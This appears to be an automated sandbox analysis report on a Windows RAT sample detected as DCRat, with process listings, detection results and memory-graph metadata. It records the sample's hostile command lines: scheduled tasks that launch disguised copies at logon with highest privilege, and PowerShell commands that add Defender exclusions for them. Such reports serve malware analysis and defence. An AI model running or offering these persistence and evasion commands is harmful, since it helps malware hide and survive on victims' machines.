65 95 d0 80 20 06 26 22 2d 1b 0a 00 00 cc 28 11 00 00 29 00 00 00 34 00 04 30 13 00 2a 00 2b 04 00
                                                  Data Ascii: %!, ,+(i~(%++++,,&-@&-i~&-Zm(+0*++(++(&-(i~-&-_(+(+(](*@0*++++&-&-&o<~(e &"-()40*+


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:1
                                                  Start time:08:12:56
                                                  Start date:23/04/2022
                                                  Path:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe"
                                                  Imagebase:0x9f0000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:low

                                                  Target ID:2
                                                  Start time:08:12:58
                                                  Start date:23/04/2022
                                                  Path:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe" user
                                                  Imagebase:0x940000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.554390785.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.552452554.0000000000FA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000002.00000002.559264843.0000000003E7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000002.00000003.547617819.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000002.00000002.559121813.0000000003D82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.558911567.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:8
                                                  Start time:08:14:23
                                                  Start date:23/04/2022
                                                  Path:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  Imagebase:0xf50000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000000.550072018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000000.550714016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000000.550360463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000000.551034384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:10
                                                  Start time:08:14:28
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff7ea560000
                                                  File size:488448 bytes
                                                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate

                                                  Target ID:11
                                                  Start time:08:14:29
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff775430000
                                                  File size:226816 bytes
                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:12
                                                  Start time:08:14:30
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\iasnap\fontdrvhost.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff775430000
                                                  File size:226816 bytes
                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:13
                                                  Start time:08:14:31
                                                  Start date:23/04/2022
                                                  Path:C:\Recovery\csrss.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Recovery\csrss.exe
                                                  Imagebase:0x960000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 29%, Metadefender, Browse
                                                  • Detection: 57%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:14
                                                  Start time:08:14:32
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comrepl\fontdrvhost.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff775430000
                                                  File size:226816 bytes
                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:15
                                                  Start time:08:14:33
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "JRFdtWyAvbQxLlvO" /sc ONLOGON /tr "'C:\Recovery\JRFdtWyAvbQxLlvO.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff775430000
                                                  File size:226816 bytes
                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:16
                                                  Start time:08:14:34
                                                  Start date:23/04/2022
                                                  Path:C:\Recovery\JRFdtWyAvbQxLlvO.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Recovery\JRFdtWyAvbQxLlvO.exe
                                                  Imagebase:0x20000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 29%, Metadefender, Browse
                                                  • Detection: 57%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:17
                                                  Start time:08:14:34
                                                  Start date:23/04/2022
                                                  Path:C:\Recovery\csrss.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Recovery\csrss.exe" user
                                                  Imagebase:0x350000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:low

                                                  Target ID:18
                                                  Start time:08:14:34
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "SearchUI" /sc ONLOGON /tr "'C:\System Volume Information\Chkdsk\SearchUI.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff775430000
                                                  File size:226816 bytes
                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:19
                                                  Start time:08:14:36
                                                  Start date:23/04/2022
                                                  Path:C:\Recovery\JRFdtWyAvbQxLlvO.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Recovery\JRFdtWyAvbQxLlvO.exe" user
                                                  Imagebase:0x6e0000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:low

                                                  Target ID:20
                                                  Start time:08:14:36
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff775430000
                                                  File size:226816 bytes
                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:21
                                                  Start time:08:14:36
                                                  Start date:23/04/2022
                                                  Path:C:\System Volume Information\Chkdsk\SearchUI.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\System Volume Information\Chkdsk\SearchUI.exe
                                                  Imagebase:0xc30000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 29%, Metadefender, Browse
                                                  • Detection: 57%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:22
                                                  Start time:08:14:37
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe'
                                                  Imagebase:0xf10000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Reputation:high

                                                  Target ID:23
                                                  Start time:08:14:38
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                                                  Imagebase:0xf10000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:24
                                                  Start time:08:14:38
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6406f0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:25
                                                  Start time:08:14:39
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\iasnap\fontdrvhost.exe'
                                                  Imagebase:0xf10000
                                                  File size:430592 bytes
                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Target ID:26
                                                  Start time:08:14:39
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6406f0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language

                                                  Target ID:27
                                                  Start time:08:14:39
                                                  Start date:23/04/2022
                                                  Path:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe
                                                  Imagebase:0xa30000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 29%, Metadefender, Browse
                                                  • Detection: 57%, ReversingLabs

                                                  Target ID:28
                                                  Start time:08:14:42
                                                  Start date:23/04/2022
                                                  Path:C:\Recovery\csrss.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Recovery\csrss.exe"
                                                  Imagebase:0x840000
                                                  File size:26624 bytes
                                                  MD5 hash:9648A5C08366B431006BCF1591F441DC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET

                                                  Reset < >
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.367673496.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_2b00000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8893b12645573f3a4dfb9c9fd377e38749fd30b0cef70cb9451b00c568ab8d21
                                                    • Instruction ID: 17e10f6758450fa5eb5b08a1a6ec815ad254136ae20590295ae94a687dd2878a
                                                    • Opcode Fuzzy Hash: 8893b12645573f3a4dfb9c9fd377e38749fd30b0cef70cb9451b00c568ab8d21
                                                    • Instruction Fuzzy Hash: 86812674E04218DFCB18DFA9C990AEEBBB2FF89304F108469D019AB354DB359985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:20.2%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:11.1%
                                                    Total number of Nodes:45
                                                    Total number of Limit Nodes:4
                                                    execution_graph 11494 1020040 11495 1020061 11494->11495 11496 1020b18 11495->11496 11498 1020521 11495->11498 11507 1020c90 11495->11507 11511 1020c89 11495->11511 11497 102041a 11497->11498 11515 1020ff8 11497->11515 11518 1020ff1 11497->11518 11522 10210b5 11497->11522 11526 10210c0 11497->11526 11498->11496 11530 1021728 11498->11530 11534 1021727 11498->11534 11508 1020cdb K32EnumProcesses 11507->11508 11510 1020d22 11508->11510 11510->11497 11512 1020cdb K32EnumProcesses 11511->11512 11514 1020d22 11512->11514 11514->11497 11516 1021040 K32EnumProcessModules 11515->11516 11517 102107a 11516->11517 11517->11497 11519 1020ff8 K32EnumProcessModules 11518->11519 11521 102107a 11519->11521 11521->11497 11525 10210c0 K32GetModuleBaseNameA 11522->11525 11524 10211d3 11525->11524 11529 1021115 K32GetModuleBaseNameA 11526->11529 11528 10211d3 11529->11528 11531 102173c 11530->11531 11538 1021324 11531->11538 11535 102173c 11534->11535 11536 1021324 EnumChildWindows 11535->11536 11537 102177d 11536->11537 11537->11498 11540 10217c0 EnumChildWindows 11538->11540 11541 102177d 11540->11541 11541->11498 11542 1020b1a 11544 10200ab 11542->11544 11543 1020b18 11544->11543 11545 1020521 11544->11545 11551 1020c90 K32EnumProcesses 11544->11551 11552 1020c89 K32EnumProcesses 11544->11552 11545->11543 11553 1021727 EnumChildWindows 11545->11553 11554 1021728 EnumChildWindows 11545->11554 11546 102041a 11546->11545 11547 1020ff1 K32EnumProcessModules 11546->11547 11548 1020ff8 K32EnumProcessModules 11546->11548 11549 10210c0 K32GetModuleBaseNameA 11546->11549 11550 10210b5 K32GetModuleBaseNameA 11546->11550 11547->11546 11548->11546 11549->11546 11550->11546 11551->11546 11552->11546 11553->11545 11554->11545

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 36 106d440-106d463 37 106d465-106d479 36->37 38 106d47b-106d484 36->38 37->38 40 106d487-106d4c1 call 106dc85 37->40 44 106d512-106d539 call 106c628 40->44 45 106d4c3-106d4d4 call 10697e8 40->45 50 106d53f-106d550 44->50 51 106d72c-106d73e call 106cf90 44->51 48 106d4d9-106d4db 45->48 48->44 52 106d4dd-106d508 call 106c0f8 48->52 58 106d552 50->58 59 106d559-106d55c 50->59 60 106d740-106d758 51->60 61 106d75d-106d763 51->61 52->44 62 106d50a-106d50f 52->62 58->59 63 106d627-106d63b 58->63 64 106d5c7-106d5da 58->64 65 106d587-106d5c2 58->65 66 106d640-106d653 58->66 67 106d60e-106d622 58->67 68 106d6a9-106d6bc 58->68 69 106d5f7-106d609 58->69 70 106d570-106d582 58->70 71 106d690-106d6a4 58->71 72 106d6be-106d6da 58->72 73 106d5df-106d5f2 58->73 74 106d658-106d674 58->74 75 106d679-106d68b 58->75 76 106d562-106d565 59->76 77 106d6dc-106d6fe 59->77 60->61 99 106d75a 60->99 78 106d765-106d76c 61->78 79 106d772-106d7bc call 106e500 61->79 62->44 63->51 64->51 65->51 66->51 67->51 68->51 69->51 70->51 71->51 72->51 73->51 74->51 75->51 80 106d700-106d72a 76->80 81 106d56b 76->81 77->51 78->79 83 106d76e-106d770 78->83 104 106d7c2 79->104 80->51 81->51 85 106d7c4-106d7c6 83->85 101 106db03-106db0c 85->101 102 106d7cc-106d823 call 106c6d8 85->102 99->61 113 106d837 102->113 114 106d825-106d835 102->114 104->85 115 106d839-106d844 113->115 114->113 114->115 118 106d866-106d89d 115->118 119 106d846-106d861 115->119 124 106d8e3-106d8eb 118->124 132 106d89f-106d8d5 118->132 119->124 126 106d8ed-106d8f7 124->126 127 106d8f9 124->127 128 106d8fe-106d900 126->128 127->128 130 106d902-106d908 128->130 131 106d910-106d982 128->131 130->131 138 106d9a6-106d9cc 131->138 139 106d984-106d99b 131->139 132->124 145 106d8d7-106d8db 132->145 143 106d9e3 138->143 144 106d9ce-106d9d9 138->144 139->138 146 106d9e5-106da04 143->146 175 106d9db call 106f300 144->175 176 106d9db call 106f2f0 144->176 145->124 146->101 149 106da0a-106da1c call 106cf90 146->149 147 106d9e1 147->146 149->101 152 106da22-106da3a 149->152 154 106da73-106da8b 152->154 155 106da3c-106da45 152->155 160 106da8d-106da96 154->160 161 106dabb-106dad3 154->161 156 106da47-106da4a 155->156 157 106da54-106da5b 155->157 156->157 157->154 158 106da5d-106da6e 157->158 158->101 163 106daa5-106daae 160->163 164 106da98-106da9b 160->164 161->101 167 106dad5-106dade 161->167 163->161 165 106dab0-106dab8 163->165 164->163 165->161 169 106dae0-106dae3 167->169 170 106daed-106daf6 167->170 169->170 170->101 171 106daf8-106db00 170->171 171->101 175->147 176->147
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: p,$p,$p,$p,
                                                    • API String ID: 0-3580380303
                                                    • Opcode ID: a68aebbdb7ebd5cd8b5abd6d0256440c660cc68f291e03432f1c9c5bfd289ce0
                                                    • Instruction ID: 1dc32c5e512154381c29c889d5d975af66eef0c4676ed267d9f81e3734380410
                                                    • Opcode Fuzzy Hash: a68aebbdb7ebd5cd8b5abd6d0256440c660cc68f291e03432f1c9c5bfd289ce0
                                                    • Instruction Fuzzy Hash: 3422B135B002049FDB14CFA8D885AADB7F6BF88310F058069E985EB3A1DB75ED41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4$tD$z0
                                                    • API String ID: 0-177581682
                                                    • Opcode ID: d0cf8b03591c12c2dad4c9ea74867f7da7e901072e5d9d682351a82e6e58f06a
                                                    • Instruction ID: a34008667b01e5ae900d4f75734366858f6a3f64e15cb220520790591b508040
                                                    • Opcode Fuzzy Hash: d0cf8b03591c12c2dad4c9ea74867f7da7e901072e5d9d682351a82e6e58f06a
                                                    • Instruction Fuzzy Hash: B9B2E574B00218CFEB54DFA8C994BADB7FAAF48300F158099E546AB265DB34ED85CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 486 1020040-102006f 676 1020071 call 1065907 486->676 677 1020071 call 10659e0 486->677 678 1020071 call 1065918 486->678 490 1020076-1020b4e 496 1020b54-1020b5b 490->496 497 10200ab-1020192 490->497 514 1020182-10201a9 497->514 515 10201ab-10201e2 497->515 514->515 523 1020210-1020248 515->523 524 10201d6-102020e 515->524 527 102024e-10202ca 523->527 528 10208af-10208c6 523->528 524->523 550 10202d8-102035c 527->550 551 10202cc-10202ce 527->551 537 10208d1 528->537 538 10208d6-1020918 537->538 546 1020975-1020978 538->546 547 102091a-1020960 538->547 549 102097e-1020a1c 546->549 558 1020965-102096f 547->558 683 1020a1e call 1021727 549->683 684 1020a1e call 1021728 549->684 577 102036a-1020389 550->577 578 102035e-1020360 550->578 551->550 558->546 559 102077d-1020794 558->559 568 102079f-10207b6 559->568 579 10207c1-10207d8 568->579 577->537 584 102038f-10203bc 577->584 578->577 590 10207e3-10207fa 579->590 583 1020a24-1020a70 583->590 597 1020a76-1020a97 583->597 588 10203c2-10203cc 584->588 589 102088d-10208a4 584->589 588->537 592 10203d2-1020410 588->592 589->528 603 1020805-102081c 590->603 674 1020415 call 1020c90 592->674 675 1020415 call 1020c89 592->675 604 1020a99-1020a9c 597->604 605 1020a9f-1020aaf 597->605 600 102041a-102042b 602 102050f-102051b 600->602 606 1020430-1020439 602->606 607 1020521 602->607 621 1020827-102083e 603->621 604->605 605->537 608 1020ab5-1020ae7 605->608 610 1020523-1020528 606->610 611 102043f-102045c 606->611 609 1020533-1020568 607->609 608->579 614 1020aed-1020af9 608->614 619 102086b-1020882 609->619 620 102056e-1020582 609->620 610->609 627 10204d6-102050e 611->627 628 102045e-102049f 611->628 622 1020afe-1020b12 614->622 619->589 624 1020584-10205a8 620->624 625 10205ae-102062c 620->625 635 1020849-1020860 621->635 622->568 626 1020b18 622->626 624->625 624->635 656 102063a-10206be 625->656 657 102062e-1020630 625->657 626->496 627->602 679 10204a1 call 1020ff1 628->679 680 10204a1 call 1020ff8 628->680 635->619 649 10204a6-10204b3 681 10204b5 call 10210c0 649->681 682 10204b5 call 10210b5 649->682 651 10204ba-10204c4 653 10204c6-10204ca 651->653 654 10204cf 651->654 653->654 654->627 666 10206c0-10206c2 656->666 667 10206cc-1020708 656->667 657->656 666->667 667->621 669 102070e-102072d 667->669 670 1020732-1020742 669->670 670->603 671 1020748-1020772 670->671 671->538 673 1020778 671->673 673->549 674->600 675->600 676->490 677->490 678->490 679->649 680->649 681->651 682->651 683->583 684->583
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (#$P$Zbl
                                                    • API String ID: 0-3470370039
                                                    • Opcode ID: f86132fb178ca0e275d1f75171825cc47771a075ff9dab979ba216be778df4cf
                                                    • Instruction ID: cde097ac796eaa2ee6143b6cbee182beb4456cb7eab28a098a69635bb8607539
                                                    • Opcode Fuzzy Hash: f86132fb178ca0e275d1f75171825cc47771a075ff9dab979ba216be778df4cf
                                                    • Instruction Fuzzy Hash: 30527E30A002299FDB14DB79C851BAEB7F2AF89304F1481A9E54AEB395DF30DD85CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4$tD$z0
                                                    • API String ID: 0-177581682
                                                    • Opcode ID: 7f20ccef662a121991d86e9ffeb008acd95b239a8a77642f59285fb2a0ae54df
                                                    • Instruction ID: ee6d71dddd601c8df1ed62c1d01e771c74b71f2f74ad45f3e3142769b75f342a
                                                    • Opcode Fuzzy Hash: 7f20ccef662a121991d86e9ffeb008acd95b239a8a77642f59285fb2a0ae54df
                                                    • Instruction Fuzzy Hash: 4832F674B00218CFDB64DF69C984BADB7B6BF48304F1580A9D949EB265DB30AD86CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: a29f209e266dddb15128ad6b8b3b9309cdf22d66bc17461eb9209b2641e2148d
                                                    • Instruction ID: 43d61cb6a4b8a00d3ef8fee91d0ddc037ae7fca20cacbb8e6abdb322f6863ab0
                                                    • Opcode Fuzzy Hash: a29f209e266dddb15128ad6b8b3b9309cdf22d66bc17461eb9209b2641e2148d
                                                    • Instruction Fuzzy Hash: 51913432F082958FCB50CF69D8800AEBBA6EBC5214B29C5BAC596DB742C735DC06C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1973fa5a1c304d6a7349b873840159f9ed55febfa9fe8314bdd45d37c068ae05
                                                    • Instruction ID: 798e65ab8dd1ff2e0d6e45bca4b15ae50feba18b6f6c7e826aafeeec944db768
                                                    • Opcode Fuzzy Hash: 1973fa5a1c304d6a7349b873840159f9ed55febfa9fe8314bdd45d37c068ae05
                                                    • Instruction Fuzzy Hash: 9D124B347042058FDB14DF29C984A6A77FAAF89704B1584A9E686DF3B1DB31EC82CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 617968de7952f39a88133ceff69fd6c076b8e2ddd1694ec8533b46eea59b8b17
                                                    • Instruction ID: 076de100ad9450ce674a4ff9f24c9a0a6106bb82b78a770bfdbc092fda00f5d5
